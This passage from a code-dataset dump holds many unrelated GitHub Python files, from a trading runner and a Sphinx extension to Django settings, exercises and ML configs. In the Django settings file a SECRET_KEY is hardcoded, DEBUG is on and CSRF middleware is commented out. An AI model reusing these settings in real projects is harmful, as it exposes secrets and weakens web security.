checks\")\n return\n\n if self.accounting_checks:\n clean, df = check_accounts(\n universe.data_universe.pairs,\n [universe.get_reserve_asset()],\n state,\n self.sync_model,\n block_identifier=end_block,\n )\n\n log_level = logging.INFO if report_only else logging.ERROR\n\n address = self.execution_model.get_balance_address()\n\n if not clean:\n block_message = f\"{end_block:,}\" if end_block else \"\"\n logger.log(\n log_level,\n f\"Accounting differences detected for: %s at block {block_message}\\n\" \n \"Differences are:\\n\"\n \"%s\",\n address,\n df.to_string()\n )\n\n if not report_only:\n logger.error(\"Aborting execution as we cannot reliable trade with incorrect balances.\")\n raise UnexpectedAccountingCorrectionIssue(\"Aborting execution as we cannot reliable trade with incorrect balances.\")\n else:\n # Path taken by some legacy tests\n logger.info(\"Accounting checks disabled - skipping\")","repo_name":"tradingstrategy-ai/trade-executor","sub_path":"tradeexecutor/strategy/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":34266,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"3"} +{"seq_id":"3776437773","text":"from pathlib import Path\nfrom typing import Any, Dict\n\nimport docutils.nodes\nimport jinja2\nfrom sphinx.application import Sphinx\nfrom sphinx.builders.html import StandaloneHTMLBuilder\nfrom sphinx.config import Config\nfrom sphinx.environment import BuildEnvironment\nfrom sphinx.errors import SphinxError\nfrom sphinx.util import copyfile\n\nfrom sphinx_ads.logging import get_logger\n\n# from sphinx_ads.directives.advertisement import AdsDirective\nfrom sphinx_ads.templates import Template\nfrom sphinx_ads.utils import load_data\n\nVERSION = \"0.0.2\"\n\n\ndef setup(app: Sphinx) -> Dict[str, Any]:\n log = get_logger(__name__)\n log.debug(\"Starting setup of Sphinx-Ads\")\n\n ########################################################################\n # CONFIG_VALUES\n ######################################################################\n # Define config values\n app.add_config_value(\"ads_path\", None, \"html\", types=[str])\n app.add_config_value(\"ads_url\", None, \"html\", types=[str])\n\n ########################################################################\n # DIRECTIVES\n ########################################################################\n\n # Define directives\n # app.add_directive(\"sphinx-ads\", AdsDirective)\n\n ########################################################################\n # EVENTS\n ########################################################################\n # Make connections to events\n app.connect(\"config-inited\", check_configuration)\n app.connect(\"builder-inited\", builder_inited)\n app.connect(\"html-page-context\", html_page_context)\n app.connect(\"env-updated\", add_static_files)\n\n # app.connect(\"env-before-read-docs\", prepare_env)\n\n return {\n \"version\": VERSION,\n \"parallel_read_safe\": True,\n \"parallel_write_safe\": True,\n }\n\n\ndef builder_inited(app: Sphinx) -> None:\n if not hasattr(app.env, \"sphinx_ads_data\"):\n # Used to store the Ads json data, so it can be easily accessible anywhere in the extension.\n app.env.sphinx_ads_data = {}\n\n load_data(app) # Loads the json data and updates env.sphinx_ads_data\n\n\ndef html_page_context(\n app: Sphinx,\n pagename: str,\n templatename: str,\n context: Dict,\n doctree: docutils.nodes.Node,\n):\n if isinstance(app.builder, StandaloneHTMLBuilder):\n template = Template(app)\n app.builder.templates.loaders.append(jinja2.FileSystemLoader(template.template_files))\n context[\"advertisement\"] = template.advertisement # Add custom Jinja function to app\n\n\n# def prepare_env(app: Sphinx, env: BuildEnvironment, _docname: str) -> None:\n# \"\"\"\n# Prepares the sphinx environment to store sphinx-ads JSON data.\n# \"\"\"\n# if not hasattr(env, \"sphinx_ads_data\"):\n# # Used to store the Ads json data, so it can be easily accessible anywhere in the extension package.\n# env.sphinx_ads_data = {}\n#\n# if app.config.ads_path is not None and len(app.config.ads_path) != 0:\n# ads_json_data: Dict = get_json_data_from_path(app)\n# env.sphinx_ads_data.update(ads_json_data)\n#\n# if app.config.ads_url is not None and len(app.config.ads_url) != 0:\n# ads_json_data: Dict = get_json_data_from_url(app)\n# env.sphinx_ads_data.update(ads_json_data)\n#\n\n\ndef check_configuration(app: Sphinx, config: Config) -> None:\n \"\"\"\n Checks the configuration options.\n \"\"\"\n if (not config[\"ads_path\"] and not config[\"ads_url\"]) or (config[\"ads_path\"] and config[\"ads_url\"]):\n raise AdsConfigException(\"You must provide one of these variables: 'ads_path' or 'ads_url', in conf.py.\")\n\n\ndef add_static_files(app: Sphinx, env: BuildEnvironment):\n log = get_logger(__name__)\n log.info(\"Copying static files for sphinx-ads\")\n\n if app.builder.format == \"html\":\n ads_libs_dir = Path(app.builder.outdir).joinpath(\"_static\")\n source_dir = Path(__file__).parent / \"libs\"\n destination_dir = ads_libs_dir / \"sphinx_ads\"\n destination_dir.mkdir(parents=True, exist_ok=True)\n\n css_file = source_dir.joinpath(\"css/sphinx_ads.css\").resolve()\n js_file = source_dir.joinpath(\"js/sphinx_ads.js\").resolve()\n\n copyfile(str(css_file), str(destination_dir / \"sphinx_ads.css\")) # copy CSS file\n copyfile(str(js_file), str(destination_dir / \"sphinx_ads.js\")) # copy JS file\n\n # link CSS and JS files to HTML document\n app.add_css_file(\"sphinx_ads/sphinx_ads.css\", rel=\"stylesheet\")\n app.add_js_file(\"sphinx_ads/sphinx_ads.js\")\n\n\nclass AdsConfigException(SphinxError):\n pass\n","repo_name":"useblocks/sphinx-ads","sub_path":"sphinx_ads/ads.py","file_name":"ads.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22631936359","text":"import os\nimport django\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'telemetry_project.settings')\n\ndjango.setup()\n\nimport serial\nimport time\nimport api.models\nimport pathlib\nimport re\n\nser = serial.Serial('/dev/ttyUSB0', 57600)\n\nall_text = ''\nlog = ''\n\nprevious_mode = '0'\n\nwhile True:\n try:\n with open('carry.txt', 'r') as dest:\n carry = dest.read()\n\n if carry == '1':\n ser.write('servo'.encode('utf-8'))\n\n with open('carry.txt', 'w') as dest:\n dest.write('0')\n \n with open('motor.txt', 'r') as dest:\n motor = dest.read()\n\n if motor == '1':\n ser.write('motor'.encode('utf-8'))\n\n with open('motor.txt', 'w') as dest:\n dest.write('0')\n\n with open('mode.txt', 'r') as dest:\n mode = dest.read()\n\n if mode != previous_mode:\n if mode == '1':\n ser.write('manual'.encode('utf-8'))\n else:\n ser.write('auto'.encode('utf-8'))\n\n previous_mode = mode\n\n time.sleep(1)\n data_read = ser.read_all().decode()\n\n all_text += data_read\n\n if 'begin' in all_text:\n print('began')\n\n while 'end' not in data_read:\n time.sleep(1)\n data_read = ser.read_all().decode()\n\n print(data_read)\n\n all_text += data_read\n\n print(all_text)\n\n log = all_text[all_text.index('begin') : all_text.index('end')]\n\n all_text = all_text[all_text.index('end') + 3 :]\n\n print('end')\n\n all_data = [data.strip() for data in re.split(\"[\\n:]+\", log)]\n\n log = log.replace('begin', '================================================')\n log += '================================================\\n'\n\n request_type = all_data[all_data.index('request_type') + 1]\n\n device_id = int(all_data[all_data.index('device_id') + 1])\n\n print(all_data)\n\n date = all_data[all_data.index('date') + 1]\n time_ = all_data[all_data.index('time') + 1].replace('.', ':')\n gps = all_data[all_data.index('gps') + 1]\n gps_find_satellite = all_data[all_data.index('gps_find_satellite') + 1]\n\n if request_type == 'NEW_DEVICE':\n api.models.Device.objects.create(\n date = date,\n time = time_,\n device_id = device_id,\n gps = gps,\n gps_find_satellite = gps_find_satellite,\n device_name = ''\n )\n\n pathlib.Path(f'api/logs/out{device_id}.log').touch()\n\n with open(f'api/logs/out{device_id}.log', 'a') as dest:\n dest.write(log)\n\n log = ''\n\n elif 'abcdefghijklmnopqrstuvwxyz' in all_text:\n ser.write('attaboy'.encode())\n except Exception as e:\n print(e)\n continue\n\nser.close()\n","repo_name":"zIlgar/Caspian_Rescuer","sub_path":"telemetry_project/telemetry_project/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"5394311444","text":"# Django settings for mobilevrs_project project.\n# Django settings for mobilevrs_project project.\nimport sys, os\n\nfiledir = os.path.dirname(__file__)\nsys.path.append(os.path.join(filedir))\nsys.path.append(os.path.join(filedir, 'rapidsms_httprouter_src'))\nsys.path.append(os.path.join(filedir, 'rapidsms_xform_src'))\nsys.path.append(os.path.join(filedir, 'django_eav'))\nsys.path.append(os.path.join(filedir, 'rapidsms_uganda_ussd'))\nsys.path.append(os.path.join(filedir, 'rapidsms_uganda_common'))\nsys.path.append(os.path.join(filedir, 'rapidsms_script'))\nsys.path.append(os.path.join(filedir, 'rapidsms_polls'))\nsys.path.append(os.path.join(filedir, 'rapidsms_generic'))\nsys.path.append(os.path.join(filedir, 'rapidsms', 'lib'))\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE' : 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'mobilevrs',\n 'USER': 'postgres',\n 'HOST': 'dbserver',\n },}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/Chicago'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = ''\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'slf#_02l51!e(ng%(z%79niv7+ql^_3@$6a+iw))uo1c!7mg%*'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n #'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'ussd',\n 'rapidsms_xforms',\n 'eav',\n 'django_extensions',\n 'mobilevrs',\n 'rapidsms',\n 'uganda_common',\n 'script',\n 'poll',\n 'generic',\n 'rapidsms_httprouter',\n 'south',\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n#caching stuff\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.db.DatabaseCache',\n 'LOCATION': 'cache_table',\n }\n}\n\n\nINITIAL_USSD_SCREEN='ussd_root'\n\ntry:\n if os.environ.has_key('LOCAL_SETTINGS'):\n # the LOCAL_SETTINGS environment variable is used by the build server\n sys.path.insert(0, os.path.dirname(os.environ['LOCAL_SETTINGS']))\n from settings_test import *\n else:\n from localsettings import *\nexcept ImportError:\n pass","repo_name":"unicefuganda/mobileVRS","sub_path":"mobilevrs_project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"284917464","text":"from django.db import models\nfrom company.models import Company\nfrom employee.models import Employee\n\nclass Address(models.Model):\n street_line1 = models.CharField('Address 1', max_length = 100, blank = True)\n street_line2 = models.CharField('Address 2', max_length = 100, blank = True)\n zipcode = models.CharField('ZIP code', max_length = 6, blank = True)\n city = models.CharField('City', max_length = 100, blank = True)\n state = models.CharField('State', max_length = 100, blank = True)\n employee = models.ForeignKey(Employee, on_delete=models.CASCADE, related_name='employee_address', null=True)\n company = models.ForeignKey(Company, on_delete=models.CASCADE, related_name='company_address', null=True)\n \n class Meta:\n verbose_name = \"Address\"\n verbose_name_plural = \"Addresses\"\n\n def __str__(self):\n return f\"{self.street_line1}\"\n","repo_name":"DamodarVishwakarma/EMP","sub_path":"EMP/apps/shared/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73389189840","text":"import json, time, shutil\nimport os, errno\nfrom urllib.request import urlopen\n\nfrom webapp.DBManager import DBManager\nfrom webapp.vars import CUSTOM_TREND_DIR, DATA_ENTRYPOINT\n\nclass CustomTrend():\n \"\"\"A class to manage customized trend search\n All custom trends are stored in CUSTOM_TREND_DIR (Path: data/ct/ct_id).\n Every custom trend folder must have a config.json file and a data_x.json file.\n \"\"\"\n\n\n def __init__(self, ct_id = None):\n self.ct_id = ct_id\n self.config = None\n self.data = None\n self.db = DBManager()\n\n def delete(self):\n \"\"\" Delete custom trend\n N.B. The ct_id must be setted\n\n Return:\n result (boolean) - loading result\n \"\"\"\n self.db.open()\n result = self.db.delete('DELETE FROM customTrends WHERE id=?', (self.ct_id,))\n self.db.close()\n return result\n\n def add(self, user_id, title):\n \"\"\" Add a new custom trend\n\n Return:\n new_id (integer) - New custom trend id\n \"\"\"\n self.db.open()\n new_id, _ = self.db.insert('INSERT INTO customTrends (userId, title) VALUES (?,?)', (user_id, title))\n self.db.close()\n\n filename = \"{}{}/config.json\".format(CUSTOM_TREND_DIR, new_id)\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except Exception as e:\n raise\n\n with open(\"{}{}/config.json\".format(CUSTOM_TREND_DIR, new_id), 'w') as f:\n default_config = {\n \"custom_config\": {\n \"alert_influencers\": True,\n \"alert_sentiment\": True,\n \"alert_trends\": True,\n \"algorithm\": 1,\n \"analysis_emoji\": True,\n \"analysis_images\": True,\n \"analysis_text\": True,\n \"georeference\": \"it\",\n \"keywords\": \"\",\n \"language\": \"it\",\n \"main_param\": 1,\n \"plot1\": \"bar_sentiment\",\n \"plot2\": \"bar_sentiment\",\n \"plot3\": \"bar_sentiment\",\n \"source_gogl\": True,\n \"source_ig\": True,\n \"source_tw\": True,\n \"timeframe\": 7,\n \"report\": 1\n },\n \"custom_trend_id\": new_id,\n \"key\": title\n }\n json.dump(default_config, f)\n\n \n self.ct_id = new_id\n return new_id\n\n\n def loadConfig(self, ct_id):\n \"\"\"Load custom trend configuration from file\n\n Params:\n ct_id (integer) - custom trend ID\n Return:\n result (boolean) - loading result\n \"\"\"\n\n self.ct_id = ct_id\n \n with open(\"{}{}/config.json\".format(CUSTOM_TREND_DIR, self.ct_id)) as f:\n self.config = json.load(f)\n return True\n\n return False\n\n\n def loadData(self):\n \"\"\"Load custom trend data. \n N.B. Before this operation configuration must be loaded.\n\n Return:\n result (boolean) - loading result\n \"\"\"\n \n try: \n data_url = '{}{}/data.json'.format(DATA_ENTRYPOINT, self.ct_id)\n data_response = urlopen(data_url)\n self.data = json.loads(data_response.read())\n return True\n\n except Exception as e:\n return False\n \n\n def saveConfig(self):\n \"\"\"Save current configuration to config.json file. \n N.B. Before this operation configuration must be loaded.\n\n Return:\n result (boolean) - saving result\n \"\"\"\n\n if self.ct_id != None and self.config != None and self.config:\n with open(\"{}{}/config.json\".format(CUSTOM_TREND_DIR, self.ct_id), 'w') as f:\n json.dump(self.config, f)\n \n self.db.open()\n self.db.update('UPDATE customTrends SET title=?WHERE id=?', (self.config['key'], self.config['custom_trend_id']))\n self.db.close()\n\n return True\n\n return False \n","repo_name":"brightdev0101/AnteoAI_python","sub_path":"webapp/dataobj/CustomTrend.py","file_name":"CustomTrend.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43023607784","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport boto3\nimport pretend\nimport pytest\n\nfrom warehouse import aws\n\n\n@pytest.mark.parametrize(\"region\", [None, \"us-west-2\"])\ndef test_aws_session_factory(monkeypatch, region):\n boto_session_obj = pretend.stub()\n boto_session_cls = pretend.call_recorder(lambda **kw: boto_session_obj)\n monkeypatch.setattr(boto3.session, \"Session\", boto_session_cls)\n\n request = pretend.stub(\n registry=pretend.stub(\n settings={\"aws.key_id\": \"my key\", \"aws.secret_key\": \"my secret\"}\n )\n )\n\n if region is not None:\n request.registry.settings[\"aws.region\"] = region\n\n assert aws.aws_session_factory(None, request) is boto_session_obj\n assert boto_session_cls.calls == [\n pretend.call(\n aws_access_key_id=\"my key\",\n aws_secret_access_key=\"my secret\",\n **({} if region is None else {\"region_name\": region})\n )\n ]\n\n\ndef test_includeme():\n config = pretend.stub(\n register_service_factory=pretend.call_recorder(lambda factory, name: None)\n )\n\n aws.includeme(config)\n\n assert config.register_service_factory.calls == [\n pretend.call(aws.aws_session_factory, name=\"aws.session\")\n ]\n","repo_name":"pypi/warehouse","sub_path":"tests/unit/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"74443776722","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef main():\n\n omega = np.reshape(np.loadtxt('omega.txt'), (NY, NX))\n\n plt.pcolor(\n omega, \n vmin=-100,\n vmax=100, \n cmap='magma'\n )\n \n plt.savefig('IC.png')\n\n return\n\n\nif __name__ == '__main__':\n\n NX = 128\n NY = 128\n\n main()","repo_name":"guemesturb/hit2d","sub_path":"plotIC.py","file_name":"plotIC.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71439938001","text":"#Exercício Python 037: Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal.\nnumber = int(input('digite um numero inteiro: '))\nprint('''escolha uma das opçoes\n1 para binario\n2 para octal \n3 para hexadecimal\n''')\noption = int(input('qual opçao desejada? '))\nif option == '1' or option == 1:\n bina = bin(number)\n print('o numero {} convertido em binario é {}'.format(number,bina[2:]))\nif option == '2' or option == 2:\n octa = oct(number)\n print('o numero {} convertido em octal é {}'.format(number,octa[2:]))\nif option == '3' or option == 3:\n hexa = hex(number)\n print('o numero {} convertido em hexadecimal é {}'.format(number, hexa[2:]))\n","repo_name":"gabrielwallaceBDS/exercicios-python-3","sub_path":"exercicios/ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33122118517","text":"def silnia1(n):\n wynik = 1\n for i in range(1,n+1):\n wynik = wynik * i\n return wynik\n\ndef silnia2(n):\n if n == 1:\n return 1\n return n * silnia2(n-1)\n\ndef silnia3(n):\n def go(n, r):\n if n == 1:\n return r\n return go(n - 1, r * (n - 1))\n return go(n, n)\n\n\n# print(silnia1(500))\n# print(silnia2(500))\n# print(silnia3(500))\n\ndef ciag_f(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return ciag_f(n-1) + ciag_f(n-2)\n\nprint(ciag_f(40))\n\ndef ciag_fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n a = 0\n b = 1\n for i in range(n):\n c = a + b\n a = b\n b = c\n return a\n\nprint(ciag_fib(40))","repo_name":"majajonez/algorytmy","sub_path":"rekurencja.py","file_name":"rekurencja.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19683750080","text":"'''\r\nDetails - Duration 15 to 20 minutes\r\nData is available in local file system /data/retail_db\r\nSource directories: /data/retail_db/orders and /data/retail_db/customers\r\nSource delimiter: comma (“,”)\r\nSource Columns - orders - order_id, order_date, order_customer_id, order_status\r\nSource Columns - customers - customer_id, customer_fname, customer_lname and many more\r\nGet the customers who have not placed any orders, sorted by customer_lname and then customer_fname\r\nTarget Columns: customer_lname, customer_fname\r\nNumber of files - 1\r\nTarget Directory: /user//solutions/solutions02/inactive_customers\r\nTarget File Format: TEXT\r\nTarget Delimiter: comma (“, ”)\r\nCompression: N/A\r\n\r\n'''\r\n\r\nordersRaw = open(\"/data/retail_db/orders/part-00000\").read().splitlines()\r\nordersRDD = sc.parallelize(ordersRaw)\r\n\r\ncustomersRaw= open(\"/data/retail_db/customers/part-00000\").read().splitlines()\r\ncustomersRDD = sc.parallelize(customersRaw)\r\n\r\nordersDF = ordersRDD.map(lambda r: (int(r.split(\",\")[0]),str(r.split(\",\")[2]))). \\\r\ntoDF(schema=[\"order_id\",\"order_customer_id\"])\r\n\r\nordersDF.registerTempTable(\"orders\")\r\n\r\ncustomerDF = customersRDD. \\\r\nmap(lambda c: (int(c.split(\",\")[0]),c.split(\",\")[2],c.split(\",\")[1])). \\\r\ntoDF(schema =([\"customer_id\",\"customer_lname\",\"customer_fname\"]))\r\n\r\n\r\ncustomerDF.registerTempTable(\"customers\")\r\n\r\nresultDF=sqlContext.sql(\"select distinct customer_lname , customer_fname \\\r\n\tfrom customers c left outer join orders o \\\r\n\ton order_customer_id = customer_id \\\r\n\twhere order_customer_id is NULL \\\r\n\torder by customer_lname,customer_fname\")\r\n\r\n\r\nresultDF.map(lambda r: r[0]+\", \"+r[1]).coalesce(1). \\\r\nsaveAsTextFile(\"/user/smakireddy/somu/solutions02/inactive_customers\")\r\n\r\n","repo_name":"smakireddy/pyspark","sub_path":"CCA/SampleProblems/ITVersity-Problem 2.py","file_name":"ITVersity-Problem 2.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5003927973","text":"import sys\nsys.stdin = open('input.txt')\n\nN,M = map(int,input().split())\nS = set()\n# check = []\ncount = 0\nfor n in range(N):\n S.add(input())\n\nfor m in range(M):\n str_m = input()\n if str_m in S:\n count += 1\n\nprint(count)\n","repo_name":"sskong777/Algorithm","sub_path":"BaekJoon/etc/14425_문자열집합/14425_문자열집합.py","file_name":"14425_문자열집합.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"74195241682","text":"def binary_search(search_list:[], begin, end, target):\n mid_index = int((begin + end) / 2)\n mid_element = search_list[mid_index]\n if mid_element == target:\n return mid_index\n\n if begin == end or begin+1 == end:\n return -2\n\n if mid_element < target:\n return binary_search(search_list, mid_index, end, target)\n elif mid_element > target:\n return binary_search(search_list, begin, mid_index, target)\n\n\ndef run(user_input=\"\"\"5\n6\n10 20 30 40 50\n40 10 35 15 40 20\"\"\"):\n params = user_input.splitlines()\n search_list = [int(i) for i in params[2].split()]\n search_targets = [int(i) for i in params[3].split()]\n\n search_results = []\n for target in search_targets:\n search_result = binary_search(search_list, 0, len(search_list)-1, target) + 1\n search_results.append(str(search_result))\n\n result = \" \".join(search_results)\n print(result)\n return result\n","repo_name":"denizcetiner/rosalindpractice","sub_path":"BINS.py","file_name":"BINS.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38105262979","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport pickle\n\n\ndef replace_sep(fin, fout, sep_ini, sep_fin):\n \"\"\"\n Replace delimiter in a file.\n \"\"\"\n fin = open(fin, \"r\")\n fout = open(fout, \"w\")\n for line in fin:\n fout.write(line.replace(sep_ini, sep_fin))\n fin.close()\n fout.close()\n\n\ndef remove_quotes(fin, fout):\n \"\"\"\n Remove quotes in lines.\n If a line has odd number quotes, remove all quotes in this line.\n \"\"\"\n fin = open(fin)\n fout = open(fout, \"w\")\n for line in fin:\n fout.write(line.replace(\"\\\"\", \"\"))\n fin.close()\n fout.close()\n\n\ndef pickle_dump_large_file(obj, filepath):\n \"\"\"\n This is a defensive way to write pickle.write,\n allowing for very large files on all platforms\n \"\"\"\n max_bytes = 2**31 - 1\n bytes_out = pickle.dumps(obj)\n n_bytes = sys.getsizeof(bytes_out)\n with open(filepath, 'wb') as f_out:\n for idx in range(0, n_bytes, max_bytes):\n f_out.write(bytes_out[idx:idx + max_bytes])\n\n\ndef pickle_load_large_file(filepath):\n \"\"\"\n This is a defensive way to write pickle.load,\n allowing for very large files on all platforms\n \"\"\"\n max_bytes = 2**31 - 1\n input_size = os.path.getsize(filepath)\n bytes_in = bytearray(0)\n with open(filepath, 'rb') as f_in:\n for _ in range(0, input_size, max_bytes):\n bytes_in += f_in.read(max_bytes)\n obj = pickle.loads(bytes_in)\n return obj\n","repo_name":"BangLiu/ArticlePairMatching","sub_path":"src/models/CCIG/util/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"3"} +{"seq_id":"30513146702","text":"# model settings\npreprocess_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375])\n\ncheckpoint = ('https://download.openmmlab.com/mmclassification/'\n 'v0/mobileone/mobileone-s4_8xb32_in1k_20221110-28d888cb.pth')\nmodel = dict(\n type='Recognizer2D',\n backbone=dict(\n type='MobileOneTSM',\n arch='s4',\n shift_div=8,\n num_segments=8,\n is_shift=True,\n init_cfg=dict(\n type='Pretrained', checkpoint=checkpoint, prefix='backbone')),\n cls_head=dict(\n type='TSMHead',\n num_segments=8,\n num_classes=400,\n in_channels=2048,\n spatial_type='avg',\n consensus=dict(type='AvgConsensus', dim=1),\n dropout_ratio=0.5,\n init_std=0.001,\n is_shift=True,\n average_clips='prob'),\n # model training and testing settings\n data_preprocessor=dict(type='ActionDataPreprocessor', **preprocess_cfg),\n train_cfg=None,\n test_cfg=None)\n","repo_name":"open-mmlab/mmaction2","sub_path":"configs/_base_/models/tsm_mobileone_s4.py","file_name":"tsm_mobileone_s4.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"22612767411","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.spatial as sp\n\ncircleRadius = 1.12\ncircleOrigin = -0.1 + 0.22j\n\n\ndef Circle(origin, radius, n=1000):\n thetas = np.linspace(0, 2 * np.pi, n, endpoint=False)\n return origin + radius * np.exp(1j * thetas)\n\n\ndef MakePotential(Gamma, r, U, origin):\n return lambda z: U * (z - origin) + U * r**2 / (\n z - origin) - 1j * Gamma / (2 * np.pi) * np.log(z - origin)\n\n\ndef Joukowski(b):\n return lambda z: z + b**2 / z\n\n\ndef IsInCircle(point, circleCentre, radius):\n return np.where(np.absolute(point - circleCentre) < radius, True, False)\n\n\ndef PotentialData(potential, Nr=2000, lower=-5, upper=5):\n x = np.linspace(lower, upper, Nr)\n y = np.linspace(-(upper - lower), upper - lower, Nr)\n xs, ys = np.meshgrid(x, y)\n Zs = xs + ys * 1j\n Ps = potential(Zs)\n return Zs, Ps\n\n\nu = 1\nrho = 1\ntransformation = Joukowski(1)\ncircle = Circle(circleOrigin, circleRadius)\nwing = transformation(circle)\n\nfor gamma in [-2.72, 5]:\n 